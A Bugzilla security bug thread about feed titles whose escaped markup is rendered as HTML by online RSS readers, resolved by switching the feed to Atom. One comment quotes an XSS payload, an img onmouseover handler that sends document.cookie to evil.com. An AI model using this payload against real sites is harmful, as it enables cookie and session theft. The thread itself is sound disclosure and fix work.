Closed Bug 313441 Opened 19 years ago Closed 18 years ago

[SECURITY] Query RSS should HTML-escape summary in <title>

Categories

(Bugzilla :: Query/Bug List, defect)

2.20
defect
Not set
critical

Tracking

()

RESOLVED FIXED
Bugzilla 2.20

People

(Reporter: philor, Assigned: philor)

References

()

Details

(Whiteboard: [doesn't affect 2.16][doesn't affect 2.18][ready for 2.20.1][ready for2.21.2])

Attachments

(4 files, 4 obsolete files)

While it's formally correct and to-spec to have an RSS 1.0 <title> that includes &lt; when it isn't starting HTML markup, since the spec calls for plain text, practically speaking the title element has been so polluted with HTML that virtually all consumers treat it as HTML, and a literal < has to be double-escaped as &amp;lt; to not be treated as markup, and either filtered out or interpreted.

With <title>Wrong DOM-tree with &lt;form&gt; and &lt;button&gt; elements.</title>, my cautious RSS reader and Google Reader both display "Wrong DOM-tree with and elements.", but the very popular Bloglines reader treats them both as HTML, and displays an actual button with the text "elements." Switching to "FILTER html" instead of "FILTER xml" to get &amp;lt;form&amp;gt; would wind up displaying "&lt;form&gt;" in strict constructionist RSS readers, but anyone using them is surely used to that by now.
XSS anyone?

Though it seems weird since we're already encoding them...  couldn't that be considered an XSS bug in said readers?
Group: webtools-security
Severity: normal → critical
Flags: blocking2.20.1+
Target Milestone: --- → Bugzilla 2.20
Bloglines must have broken their XSS filter: it's currently happy to display old favorites like |&lt;img src="..." onmouseover="this.src='http://evil.com/get?'+document.cookie">|, and since its whole interface is done in JavaScript... ouch. I don't *think* they've always been that insecure.

Me, I just want to be able to read the whole summary of bugs without missing chunks.
Attached patch One filter ain't enough (obsolete) — Splinter Review
The fact that we call the desired state, &amp;lt; or &amp;amp;#161;, "double escaped" should have tipped me off that one FILTER wouldn't be enough. Static copy of sample output at http://philringnalda.com/mtests/bugzilla/rss/escaped-title.xml works fine in Bloglines and two other browser-based readers, and three desktop readers. Google Reader, though, is insane beyond belief, and double-decodes it and renders the HTML.

I should know better than to mention this sort of alternative when I want a patch reviewed, but: this ambiguity is one of the three reasons that Atom exists. <atom:title type="text">&lt;form&gt;</atom:title> has exactly one possible meaning, and no question whatsoever about who is wrong if it isn't displayed as "<form>".
Assignee: query-and-buglist → bugzilla
Status: UNCONFIRMED → ASSIGNED
Attachment #200571 - Flags: review?(myk)
Meh. Google contacted. Bloglines contacted. NewsGator Online contacted.

If we're going to leave this security-sensitive until every browser-based RSS reader is free of XSS foolishness, we might want to clone an innocuous version to check in from. The first really wide-spread PoC I remember was the precursor to http://diveintomark.org/archives/2003/06/12/how_to_consume_rss_safely which was just a style="position:absolute;..." attribute. It's been very widely known in the RSS world that either you only allow through those elements and attributes you can trust, or you break and spew secrets, for more than two years, but it only took me half an hour to find XSS holes in the biggest three free online readers.
Google Reader: fixed. NewsGator Online: fixed. Bloglines: strongly not recommended to my friends and family anymore.
Comment on attachment 200571 [details] [diff] [review]
One filter ain't enough

My blessedly spotty memory made me forget the details of this impossible situation: RSS 1.0 clearly specifies that title is plain text, the author of RSS 2.0 says that because the spec says that description may contain entity-encoded HTML but it doesn't say that title may, the content model for RSS 2.0 title is plain text, so the feed validator warns on any feed which contains anything which might be escaped HTML, so the current RSS is absolutely unquestionably correct, and fails in virtually any client (and those like Firefox where it doesn't have bugs filed on them to make them fail).

If you need to use the character "<" in a feed title, which Bugzilla absolutely does, you have exactly three choices: be invalid and work, be valid and fail, or, the *only* real choice, use Atom instead.
Attachment #200571 - Attachment is obsolete: true
Attachment #200571 - Flags: review?(myk)
If I understand correctly, what we actually do is correct. And even if some tags are interpreted in the bug summary, I really don't see how they could use this exploit to get sensitive information.

I'm suggesting WONTFIX.
Jesse, Dan, Brad, opinions?  Or Myk even (forumzilla) ?
The official RSS spec at http://web.resource.org/rss/1.0/spec#s5.5.1
says that the <title> element contains #PCDATA, it does not say that it contains plain text.

According to W3Schools (http://www.w3schools.com/dtd/dtd_building.asp):

----8<----
PCDATA means parsed character data.

Think of character data as the text found between the start tag and the end tag of an XML element.

PCDATA is text that will be parsed by a parser. Tags inside the text will be treated as markup and entities will be expanded.
----8<----

This means if we follow the spec to the letter, the contents of the title CAN contain <, >, and &, but they need to be escaped.  ONCE.  Any that are not escaped will be treated as tags and parsed.

This is what we do now for title.  So Bugzilla is fine.  If we follow the spec.

However, looking at the source of our RSS, we appear to be escaping the HTML in the <description> field, also, which is also declared to be #PCDATA.

    <description>      
      &lt;table&gt;
      &lt;tr&gt;
        &lt;th&gt;Field&lt;/th&gt;&lt;th&gt;Value&lt;/th&gt;
      &lt;/tr&gt;&lt;tr&gt;
        &lt;td&gt;Opened&lt;/td&gt;
        &lt;td&gt;2005-10-24&lt;/td&gt;
      &lt;/tr&gt;&lt;tr&gt;
        &lt;td&gt;Assignee&lt;/td&gt;
        &lt;td&gt;Dave Miller&lt;/td&gt;
      &lt;/tr&gt;&lt;tr&gt;
        &lt;td&gt;Priority&lt;/td&gt;
        &lt;td&gt;--&lt;/td&gt;
      &lt;/tr&gt;&lt;tr&gt;
        &lt;td&gt;Severity &lt;/td&gt;
        &lt;td&gt;blocker&lt;/td&gt;
      &lt;/tr&gt;&lt;tr&gt;
        &lt;td&gt;Status&lt;/td&gt;
        &lt;td&gt;NEW&lt;/td&gt;
      &lt;/tr&gt;&lt;tr&gt;
        &lt;td&gt;Changed&lt;/td&gt;
        &lt;td&gt;Mon 07:01&lt;/td&gt;
      &lt;/tr&gt;
      &lt;/table&gt;
    </description>

If I'm reading the spec correctly, this is over-escaped.  Yet it looks fine in my RSS reader (NetNewsWire Lite).
What the RSS 1.0 spec says matters formally, but not practically, because by far the bulk of consumers just parse everything into uniform buckets and treat the contents as escaped soup even if they didn't come from RSS 2.0. See, e.g., http://groups.yahoo.com/group/rss-dev/message/7255 and up the thread where RSS-DEV working group members say, roughly, "RSS 2.0 has polluted the content model, it's now escaped HTML."

If you want to be formally correct with content, while still passing HTML, you can use the <content:encoded> element for escaped HTML, but you still have the same problem with the required <description> that you have with <title>: it cannot contain HTML, but < passed correctly for plain text as &lt; will be interpreted as markup. Even Thunderbird, which survives the unescaped titles, interprets markup in description.

If you insist on not switching to Atom, and insist on not following the lead of virtually every consumer and the advice of the WG, there is one other option: replace every "<" in titles and plain text descriptions with a roughly similar looking character, say a &#x2039;. It looks awful in most fonts, but at least it's unambiguously not markup.
OK, basically there's no sane way to fix this while continuing to use RSS 1.0.  If we intend to have HTML markup (or characters that could be used to create HTML markup) then we need to be using either RSS 2.0 or Atom.
Flags: blocking2.22+
(In reply to comment #11)
> we need to be using either RSS 2.0 or Atom.

RSS 2.0 only solves the problem for <description>, and is even more ambiguous for instances of "&lt;" or "&amp;lt;" in <title>s, since the only points of reference for whether it's HTML or plain text are a weblog post by the spec author which explicitly says "this is not spec text" and each individual's interpretation of the meaning of the spec saying of <description> that it "may contain entity-encoded HTML" and saying nothing either way about <title>.

Even with Atom, there are still likely to be consumers which will misrender it; the difference is that for any misrendering, there is no doubt whatsoever whether it's Bugzilla's bug or the consumer's bug.
RSS 2.0 has numerous problems besides just the inconsistency Phil pointed out.  RSS 1.0 is better, but work on it seems to have died out years ago, and it hasn't kept up with the times.  Atom is both extant and sensible.  We should switch to it.
This may help us writing Atom feeds:

http://www.atomenabled.org/developers/syndication/

Also: "2005-11-21: W3C is pleased to launch the W3C Feed Validation Service, a free online tool open to creators of syndication feeds in formats such as RSS and Atom." The URL is: http://validator.w3.org/feed/
Phil, are you going to implement Atom yourself? This bug is assigned to you and we plan to release 2.20.1 and 2.21.2 very soon now.
Whiteboard: [doesn't affect 2.16, doesn't affect 2.18]
Gah, you're right, I did forget it was assigned to me. I'm working on it now, but anyone should feel free to steal it if I screw up again. Speaking of which: anyone who can, which doesn't seem to include me, should make it public: the last need for it to be security-sensitive, Bloglines' XSS holes, mostly got fixed after I published them, and then I screwed up and syndicated that post to planet.m.o, so the whole Moz community already knows about their vulnerability.

(BTW: W3C's feed validator is a branch, currently from mid-October though they're going to try to get closer to tip; http://www.feedvalidator.org is at most a few hours behind tip.)
Attached patch First cut work in progress (obsolete) — Splinter Review
Close as I think I can get with read-only access: I don't know how to fake a cvs remove of list.rss.tmpl.

The code to get the feed/updated date could use a more experienced eyeballing: it seems to work with my test data, but I haven't ever done much with Template Toolkit to know what's right and wrong.

Both sorts of <id>s make me nervous: the feed/id with lots of URL-encoding and XML-escaping is at risk of misinterpretation by buggy software, though there's really no alternative, and the entry/ids quite possibly should be specific to a particular feed, and not the id that an entry containing the whole content of the bug would use, but minting a feed-specific tag: URI isn't easy.

Then there's the choice of which sort of content escaping to use, which is the biggest reason I'm not really ready for actual review: even though Atom makes it perfectly clear who is at fault, there's at least one widely-used reader which will misinterpret any given type. For the otherwise-best choice, type="html", Firefox is one of the ones misinterpreting it, but with Firefox's only workable choice, type="text", we're back to comment 0 - Bloglines (clearly incorrectly, in type="text" Atom) interprets what they should be escaping, though with a few less XSS holes than a month ago.
Comment on attachment 205023 [details] [diff] [review]
First cut work in progress

>Index: webtools/bugzilla/buglist.cgi

>-if ($format->{'extension'} eq 'rss') {
>+if ($format->{'extension'} eq 'rss' ||
>+    $format->{'extension'} eq 'atom') {

Any reason to keep 'rss' here?
(In reply to comment #18)
> Any reason to keep 'rss' here?

An abortive attempt at not breaking existing users, and installs that want to use RSS or both (client support for Atom isn't perfect and complete yet, and there are people with political preferences for one over the other).

Advice welcome: should I just intercept ctype=rss and force it to ctype=atom at some point?
> Advice welcome: should I just intercept ctype=rss and force it to ctype=atom at
> some point?

I think that's the best behavior.  Feed readers generally grep for feed type, so they should be able to handle the type changing out from under them, and if we're not going to have an RSS feed anymore we're better off directing users to the Atom feed than telling them "document not found".
Attached patch Like so? (obsolete) — Splinter Review
Okay, with a cvs remove list.rss.tmpl I think this wipes it out completely.
Attachment #205023 - Attachment is obsolete: true
Attachment #205101 - Flags: review?(myk)
(In reply to comment #21)
> Okay, with a cvs remove list.rss.tmpl I think this wipes it out completely.

cvsdo remove template/en/default/list/list.rss.html

/usr/bin/cvsdo is in the cvsutils package. And it doesn't require any write access privilege. ;)
cc:ing some Atomistas, if the security flag lets me: comment 17 and sample output at http://philringnalda.com/mtests/bugzilla/atom/bugs-2005-12-05.atom if you'd be so kind.
Looks like Firefox doesn't like Atom. Any suggestion for a good Firefox extension?
Firefox WFM (at least, with type="text", it's bugged for type="html"): bookmarks manager, File, New Live Bookmark, add the sample URL and it works. How is it failing you?

The usual suspects for content, not just titles, are http://sage.mozdev.org/ and http://habarixenu.mozdev.org/ though http://weblog.philringnalda.com/2005/12/05/telling-markup-from-text#comment-12005 says that both are buggy with type="text" titles.
(In reply to comment #25)
> How is it failing you?

Clicking the link in comment 23 makes Firefox to download it, and dragging it in my Personal bar doesn't help. /me has Fx 1.5
(In reply to comment #26)
> Clicking the link in comment 23 makes Firefox to download it

Oh, bug 155730. You aren't allowed to see application/atom+xml, or any */*+xml. Add it as a Live Bookmark (self-plug: http://weblog.philringnalda.com/firefox-extensions/livebookmarkthis/) or download it and fool Firefox with a local file.
RFC 4287: The Atom Syndication Format
Whiteboard: [doesn't affect 2.16, doesn't affect 2.18] → [doesn't affect 2.16][doesn't affect 2.18]
Comment on attachment 205101 [details] [diff] [review]
Like so?

There's only one problem with this patch: the feed for a bug list with one bug contains no entry for that bug, just a description of the feed itself, as if the search had returned no results.  The RSS version displays the single item correctly, so this is a regression.

Fix that, and I'll grant review.

Note that if the list contains no bugs, feedvalidator.org complains that the feed's author element is missing.  But I think feedvalidator is in the wrong here, since the rule from the RFC is:

   o  atom:feed elements MUST contain one or more atom:author elements,
      unless all of the atom:feed element's child atom:entry elements
      contain at least one atom:author element.

Per this rule, it seems to me that if there are no entries, you don't have to add an author to the feed itself, since all of the entry elements do contain an author element, even if "all" here is zero.

feedvalidator.org also complains that "title should not contain HTML unless declared in the type attribute" for bugs whose titles reference entities (f.e. &#1503;).  But the validator is assuming incorrectly that the title contains HTML, when in fact it does not (the titles are plain text, and any HTML-like constructs are meant to be displayed literally).
Attachment #205101 - Flags: review?(myk) → review-
(In reply to comment #29)
> There's only one problem with this patch: the feed for a bug list with one bug
> contains no entry for that bug

I'm astonished that it actually gave them all when n > 1 - I was foolishly popping off the latest bug to get the feed-level updated, I don't see why that doesn't take one off when there's more than one. If I understood Template Toolkit, I might say that was a bug in it.

> Note that if the list contains no bugs, feedvalidator.org complains that the
> feed's author element is missing.  But I think feedvalidator is in the wrong
> here

Agreed, I'll fix it or file it. And since a Zarro Boogs feed can be useful, I'll file a bug on Bugzilla to move the "Feed" link out of the bugs.size > 0 section once this one's fixed.
>Agreed, I'll fix it or file it.

For what it's worth, the error suggested I mail the feedvalidator-users list if I disagreed with the message, so I have done so.
Attached patch last, not popSplinter Review
.last instead of .pop

Have to hope there aren't any clients that will be bothered by having the current date for feed/updated in an empty feed, since there's no way we can give the date when the contents of an empty feed actually changed.
Attachment #205101 - Attachment is obsolete: true
Attachment #205369 - Flags: review?(myk)
The "Internal Server Error" I've gotten both times I added an attachment with a review flag set is a known bug with security flagged bugs, isn't it?
Comment on attachment 205369 [details] [diff] [review]
last, not pop

Yup.
Attachment #205369 - Flags: review?(myk) → review+
Phil, does your patch apply on both the tip and 2.20? If yes, can you request approval for both tip and 2.20 please and add [ready for 2.20.1][ready for 2.21.2] in the status whiteboard? Else a backport for 2.20 is required.
Attached patch For 2_20-Branch (obsolete) — Splinter Review
Just some fuzz in the context.
Flags: approval?
Flags: approval2.20?
Whiteboard: [doesn't affect 2.16][doesn't affect 2.18] → [doesn't affect 2.16][doesn't affect 2.18][ready for 2.20.1][ready for2.21.2]
Comment on attachment 205513 [details] [diff] [review]
For 2_20-Branch

backports need to be reviewed too.
Attachment #205513 - Flags: review?(myk)
Attachment #205513 - Flags: review?(myk) → review+
Blocks: 320312
This patch is now live on our QA installations, e.g. http://landfill.bugzilla.org/qa220/ but neither Fx nor Tb can read the generated Atom feed, and it seems that FeedValidator doesn't accept that long uri.

Phil, could you do some tests at the URL above and let us know what's going on? I'm using Fx 1.5.0.1 and I could click the icon in the address bar and successfully add it to my bookmarks, but when opening this feed, I get the message: "Live Bookmark Feed failed to load".
Comment on attachment 205513 [details] [diff] [review]
For 2_20-Branch

>Index: template/en/default/list/list.atom.tmpl

>+<?xml version="1.0"[% IF Param('utf8') %] encoding="UTF-8"[% END %]?>


Here is the reason why it doesn't work: utf8 doesn't exist on 2.20:

"undef error - Can't find param named utf8 at Bugzilla/Config.pm line 151."
Attachment #205513 - Flags: review-
(In reply to comment #39)
> >+<?xml version="1.0"[% IF Param('utf8') %] encoding="UTF-8"[% END %]?>

Replacing this line by: <?xml version="1.0"?> fixes the problem. This change is now applied on our QA installation for 2.20.

Phil, please post a new patch with this change.
Arrgh! Next problem: the very first feed I validated with real data (try validating searches from "Find a Specific Bug", they're shorter URLs) gives us a warning that "name should not be blank" from a reporter without a realname. What do we want to use in that case? Is the username from the email that's used for flags already available to me there? And do we already have a routine to strip empty parameters from query URLs that we could use on the feed URL? The validator's far from the only thing that enforces a needless 255 character limit on URLs.
Attached patch 2_20-Branch v2Splinter Review
Any client which treats an XML decl without an encoding when the file was sent as application/atom+xml as any different than having a hardcoded |encoding="UTF-8"| is utterly broken, anyway.
Attachment #205513 - Attachment is obsolete: true
Attachment #208257 - Flags: review?(myk)
Comment on attachment 208257 [details] [diff] [review]
2_20-Branch v2

This change is already applied on our QA installation for 2.20 and works with Fx and Tb. r=LpSolit
Attachment #208257 - Flags: review+
Attachment #208257 - Flags: review?(myk) → review+
Version: unspecified → 2.20
Flags: approval?
Flags: approval2.20?
Flags: approval2.20+
Flags: approval+
tip:

Checking in buglist.cgi;
/cvsroot/mozilla/webtools/bugzilla/buglist.cgi,v  <--  buglist.cgi
new revision: 1.325; previous revision: 1.324
done
Checking in Bugzilla/Constants.pm;
/cvsroot/mozilla/webtools/bugzilla/Bugzilla/Constants.pm,v  <--  Constants.pm
new revision: 1.34; previous revision: 1.33
done
Checking in template/en/default/global/header.html.tmpl;
/cvsroot/mozilla/webtools/bugzilla/template/en/default/global/header.html.tmpl,v  <--  header.html.tmpl
new revision: 1.40; previous revision: 1.39
done
RCS file: /cvsroot/mozilla/webtools/bugzilla/template/en/default/list/list.atom.tmpl,v
done
Checking in template/en/default/list/list.atom.tmpl;
/cvsroot/mozilla/webtools/bugzilla/template/en/default/list/list.atom.tmpl,v  <--  list.atom.tmpl
initial revision: 1.1
done
Checking in template/en/default/list/list.html.tmpl;
/cvsroot/mozilla/webtools/bugzilla/template/en/default/list/list.html.tmpl,v  <--  list.html.tmpl
new revision: 1.46; previous revision: 1.45
done
Removing template/en/default/list/list.rss.tmpl;
/cvsroot/mozilla/webtools/bugzilla/template/en/default/list/list.rss.tmpl,v  <--  list.rss.tmpl
new revision: delete; previous revision: 1.5
done


2.20:

Checking in buglist.cgi;
/cvsroot/mozilla/webtools/bugzilla/buglist.cgi,v  <--  buglist.cgi
new revision: 1.299.2.10; previous revision: 1.299.2.9
done
Checking in Bugzilla/Constants.pm;
/cvsroot/mozilla/webtools/bugzilla/Bugzilla/Constants.pm,v  <--  Constants.pm
new revision: 1.25.2.2; previous revision: 1.25.2.1
done
Checking in template/en/default/global/header.html.tmpl;
/cvsroot/mozilla/webtools/bugzilla/template/en/default/global/header.html.tmpl,v  <--  header.html.tmpl
new revision: 1.39.4.1; previous revision: 1.39
done
Checking in template/en/default/list/list.atom.tmpl;
/cvsroot/mozilla/webtools/bugzilla/template/en/default/list/list.atom.tmpl,v  <--  list.atom.tmpl
new revision: 1.1.2.2; previous revision: 1.1.2.1
done
Checking in template/en/default/list/list.html.tmpl;
/cvsroot/mozilla/webtools/bugzilla/template/en/default/list/list.html.tmpl,v  <--  list.html.tmpl
new revision: 1.37.2.2; previous revision: 1.37.2.1
done
Removing template/en/default/list/list.rss.tmpl;
/cvsroot/mozilla/webtools/bugzilla/template/en/default/list/Attic/list.rss.tmpl,v  <--  list.rss.tmpl
new revision: delete; previous revision: 1.2.2.1
done
Status: ASSIGNED → RESOLVED
Closed: 18 years ago
Resolution: --- → FIXED
Security Advisory posted; unlocking bug.
Group: webtools-security
now Bugzilla feed is Atom, not RSS 1.0
Attachment #213434 - Flags: review?(documentation)
Attachment #213434 - Flags: review?(documentation) → review+
Summary: Query RSS should HTML-escape summary in <title> → [SECURITY] Query RSS should HTML-escape summary in <title>
Attachment #219117 - Flags: review?(documentation) → review+
Blocks: 314659
Blocks: 367674
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Created:
Updated:
Size: